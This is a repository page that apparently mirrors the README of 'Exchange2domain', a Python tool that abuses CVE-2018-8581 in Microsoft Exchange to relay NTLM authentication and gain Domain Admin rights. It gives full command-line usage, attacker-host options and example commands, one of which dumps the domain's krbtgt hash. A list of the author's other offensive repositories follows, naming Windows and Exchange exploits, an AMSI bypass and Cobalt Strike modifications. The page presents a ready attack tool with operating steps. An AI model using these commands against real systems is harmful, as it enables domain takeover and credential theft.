Ridter/Exchange2domain Ridter/Exchange2domain

  • Stars
    star
    358
  • Rank 118,109 (Top 3 %)
  • Language
    Python
  • License
    MIT License
  • Created over 5 years ago
  • Updated over 1 year ago
Twitter logo Share LinkedIn logo Share Facebook logo Share
Ridter/Exchange2domain
github

Ridter

Reviews

There are no reviews yet. Be the first to send feedback to the community and the maintainers!

Repository Details

CVE-2018-8581

Exchange2domain

Python 2.7

All in One tools of privexchange . You only need to open the web server port, so no high privileges are required.

Great writeup! Abusing Exchange: One API call away from Domain Admin.

Requirements

These tools require impacket. You can install it from pip with pip install impacket.

Usage

usage: Exchange2domain.py [-h] [-u USERNAME] [-d DOMAIN] [-p PASSWORD]
                          [--hashes HASHES] [--no-ssl]
                          [--exchange-port EXCHANGE_PORT] -ah ATTACKER_HOST
                          [-ap ATTACKER_PORT] -th TARGET_HOST
                          [-exec-method [{smbexec,wmiexec,mmcexec}]]
                          [--exchange-version EXCHANGE_VERSION]
                          [--attacker-page ATTACKER_PAGE]
                          [--just-dc-user USERNAME] [--debug]
                          HOSTNAME

Exchange your privileges for Domain Admin privs by abusing Exchange. Use me
with ntlmrelayx

positional arguments:
  HOSTNAME              Hostname/ip of the Exchange server

optional arguments:
  -h, --help            show this help message and exit
  -u USERNAME, --user USERNAME
                        username for authentication
  -d DOMAIN, --domain DOMAIN
                        domain the user is in (FQDN or NETBIOS domain name)
  -p PASSWORD, --password PASSWORD
                        Password for authentication, will prompt if not
                        specified and no NT:NTLM hashes are supplied
  --hashes HASHES       LM:NLTM hashes
  --no-ssl              Don't use HTTPS (connects on port 80)
  --exchange-port EXCHANGE_PORT
                        Alternative EWS port (default: 443 or 80)
  -ah ATTACKER_HOST, --attacker-host ATTACKER_HOST
                        Attacker hostname or IP
  -ap ATTACKER_PORT, --attacker-port ATTACKER_PORT
                        Port on which the relay attack runs (default: 80)
  -th TARGET_HOST, --target-host TARGET_HOST
                        Hostname or IP of the DC
  -exec-method [{smbexec,wmiexec,mmcexec}]
                        Remote exec method to use at target (only when using
                        -use-vss). Default: smbexec
  --exchange-version EXCHANGE_VERSION
                        Exchange version of the target (default: Exchange2013,
                        choices:Exchange2010,Exchange2010_SP1,Exchange2010_SP2
                        ,Exchange2013,Exchange2013_SP1,Exchange2016)
  --attacker-page ATTACKER_PAGE
                        Page to request on attacker server (default:
                        /privexchange/)
  --just-dc-user USERNAME
                        Extract only NTDS.DIT data for the user specified.
                        Only available for DRSUAPI approach.
  --debug               Enable debug output

example:

python Exchange2domain.py -ah attackterip   -ap listenport -u user -p password -d domain.com -th DCip MailServerip

If you only want to dump krbtgt, use --just-dc-user.

example:

python Exchange2domain.py -ah attackterip -u user -p password -d domain.com -th DCip  --just-dc-user krbtgt MailServerip

Update

Auto backup old SD for restore.

More Repositories

1

Intranet_Penetration_Tips

2018年初整理的一些内网渗透TIPS,后面更新的慢,所以整理出来希望跟小伙伴们一起更新维护~
4,089
star
2

noPac

Exploiting CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user
Python
567
star
3

CVE-2017-11882

CVE-2017-11882 from https://github.com/embedi/CVE-2017-11882
Python
531
star
4

Pentest

tools
C
524
star
5

cve-2020-0688

cve-2020-0688
Python
315
star
6

acefile

POC of https://research.checkpoint.com/extracting-code-execution-from-winrar/
Python
270
star
7

CVE-2019-1040

CVE-2019-1040 with Exchange
Python
237
star
8

Mailget

通过脉脉用户猜测企业邮箱
Python
227
star
9

get_ip_by_ico

从shodan获取使用了相同favicon.ico的网站
Python
190
star
10

CVE-2018-15982_EXP

exp of CVE-2018-15982
Python
181
star
11

PySQLTools

Mssql利用工具
Python
165
star
12

RTF_11882_0802

PoC for CVE-2018-0802 And CVE-2017-11882
Python
164
star
13

owa_info

获取Exchange信息的小工具
Python
160
star
14

RelayX

NTLM relay test.
Python
156
star
15

CS_Chinese_support

Cobalt strike 修改支持回显中文。
145
star
16

MyJSRat

This is JSRat.ps1 in Python
Python
134
star
17

AMSI_bypass

XSLT
78
star
18

SharpAddDomainMachine

SharpAddDomainMachine
C#
68
star
19

proxyshell_payload

proxyshell payload generate
Python
67
star
20

cs_custom_404

Cobalt strike custom 404 page
HTML
61
star
21

GhostPotato

Just pick out the code we need.
Python
52
star
22

pyForgeCert

pyForgeCert is a Python equivalent of the ForgeCert.
Python
51
star
23

DomainHiding

external c2 use domainhiding.
Go
48
star
24

hackredis

Python
42
star
25

p12tool

A simple Go script to brute force or parse a password-protected PKCS#12 (PFX/P12) file.
Go
39
star
26

MSSQL_CLR

MSSQL CLR for pentest.
C#
35
star
27

CVE-2019-1040-dcpwn

CVE-2019-1040 with Kerberos delegation
Python
32
star
28

WebDAV

Set Up WebDAV Server for Remote File Sharing and more
Shell
31
star
29

warp_proxy

cloudflare socks5 server
Shell
31
star
30

atexec-pro

Fileless atexec, no more need for port 445
Python
29
star
31

tshtun

Py写的tsh的流量加解密过程。
C
25
star
32

xslt_poc

Execute codes From XSLT
XSLT
17
star
33

mousejack_replay

mousejack hack
Python
11
star
34

Python_Codes

some python codes
Python
9
star
35

Cortana

Some Cortana scripts
Ruby
3
star
36

comment

orz..
2
star
37

gitTun

GIt tun
Python
1
star
38

Ridter

1
star